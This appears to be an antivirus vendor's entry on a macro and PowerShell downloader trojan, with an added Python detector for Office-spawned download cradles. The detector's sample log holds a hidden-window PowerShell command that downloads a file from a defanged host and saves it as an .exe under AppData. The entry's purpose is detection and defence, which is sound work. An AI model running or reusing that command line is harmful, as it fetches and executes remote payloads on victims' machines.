VBA/Agent.EZS!tr.dldr

Analysis



VBA/Agent.EZS!tr.dldr is a generic detection for a Macro/PowerShell Downloader Trojan. Since this is a generic detection, this malware may have varying behaviour.
Below are some of the observed characteristics/behaviours for this infection:

  • This malicious document issues a PowerShell command line that may download a payload from any of several remote sites, then usually saves it as %AppData%\[Random].exe, after which it executes it.
    At the time of our test, the download did not materialize.

  • This malware was also observed to connect to the same sites using a second URL on each host: an s.php script whose id query parameter names the payload.

  • Below are illustrations of infected document(s):

    • Figure 1: Infected document.
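The behaviour described above (an Office document spawning PowerShell that fetches a payload and drops it as an .exe under %AppData%) can be matched in process-creation telemetry. The following is an added example, not Fortinet's detection logic; it assumes a hypothetical one-line-per-event log format and uses constructed sample events (the command lines are abbreviated with "...").

```python
import re

# Hypothetical event format, constructed for this example:
#   ParentImage=<path> Image=<path> CommandLine=<rest of line>
EVENT_RE = re.compile(r"ParentImage=(.+?)\s+Image=(.+?)\s+CommandLine=(.*)$")

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Download verbs commonly seen in macro-launched PowerShell command lines.
DOWNLOAD_TOKENS = ("downloadfile", "downloadstring", "invoke-webrequest", "webclient")
# An .exe written under %AppData% (also matches $env:APPDATA\name.exe).
APPDATA_EXE_RE = re.compile(r"appdata(?:\\roaming)?\\[^\\\s'\"]+\.exe", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

def parse_event(line):
    """Return (parent_image, image, command_line) for one log line."""
    m = EVENT_RE.match(line.strip())
    if not m:
        raise ValueError("unparseable event: %r" % line)
    return m.groups()

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def indicators(event):
    """List the behavioural indicators present in one process-creation event."""
    parent, image, cmd = event
    if _basename(image) not in SHELLS:
        return []
    found, cl = [], cmd.lower()
    if _basename(parent) in OFFICE_APPS:
        found.append("office-parent")
    if any(tok in cl for tok in DOWNLOAD_TOKENS):
        found.append("download-cradle")
    if APPDATA_EXE_RE.search(cl):
        found.append("appdata-exe-drop")
    if HIDDEN_RE.search(cl):
        found.append("hidden-window")
    return found

def is_macro_downloader(event):
    """Alert only when Office spawns PowerShell that downloads or drops an .exe under %AppData%."""
    ind = set(indicators(event))
    return "office-parent" in ind and bool(ind & {"download-cradle", "appdata-exe-drop"})

# Constructed sample events (not real telemetry). Line 0 mirrors the macro downloader;
# line 1 is an admin script with no Office parent; line 2 is a benign Office-spawned shell.
SAMPLE_LOG = [
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -w hidden -c ...DownloadFile('hxxp://kkduacizhbadqw{Removed}.com/XL/itron.pyc','C:\Users\u\AppData\Roaming\ab12.exe')...",
    r"ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -c Invoke-WebRequest https://updates.example.test/tool.zip -OutFile C:\Users\u\AppData\Roaming\tool.zip",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -c Get-Date",
]

def triage(lines):
    """Indices of log lines that match the macro-downloader pattern."""
    return [i for i, line in enumerate(lines) if is_macro_downloader(parse_event(line))]

if __name__ == "__main__":
    for i in triage(SAMPLE_LOG):
        print("ALERT line %d: %s" % (i, indicators(parse_event(SAMPLE_LOG[i]))))
```

Requiring the Office parent alongside a download or drop indicator keeps ordinary administrative PowerShell (line 1) out of the alert set.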




Recommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

FortiGate
Extended
FortiClient
FortiMail
FortiSandbox
FortiWeb
Web Application Firewall
FortiIsolator
FortiDeceptor
FortiEDR

Version Updates

Date Version Detail
2019-05-03 68.25000 Sig Added
2019-05-03 68.24700 Sig Updated